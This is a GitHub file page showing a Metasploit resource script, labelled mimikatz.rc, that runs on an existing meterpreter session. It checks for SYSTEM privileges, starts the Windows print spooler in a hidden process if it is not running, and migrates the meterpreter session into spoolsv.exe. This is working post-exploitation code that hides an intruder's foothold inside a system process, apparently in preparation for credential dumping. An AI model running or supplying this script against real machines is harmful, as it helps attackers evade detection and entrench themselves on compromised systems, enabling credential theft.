Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
48 lines (35 sloc) 1.07 KB
# mimikatz.rc
# checks if spooler is running. If not, starts it
# migrates to spooler
# usage (e.g. from msfconsole)
# setg SESSION 1
# resource spooler_migrate
<ruby>
session = framework.sessions[Integer(framework.datastore['SESSION'])]
if (session.type == "meterpreter")
uid = session.sys.config.getuid
if (uid != "NT AUTHORITY\\SYSTEM")
print_error("Error, must have SYSTEM meterpreter shell")
return
end
processes = session.sys.process.get_processes
spooler_proc = nil
while (spooler_proc == nil)
processes.each do |proc|
spooler_proc = proc['pid'] if proc['name'] == "spoolsv.exe" and proc["user"] == "NT AUTHORITY\\SYSTEM"
end
if (spooler_proc == nil)
print_status("spooler isn't running - starting")
print_status("net start spooler")
m_cmd = "net start spooler"
proc = session.sys.process.execute(m_cmd , nil, {'Hidden' => 'true', 'Channelized' => true})
proc.wait()
print_status("sleeping for 20")
sleep 20
end
end
print_status("migrating to spooler")
session.core.migrate(spooler_proc)
print_status("done migrating")
end
</ruby>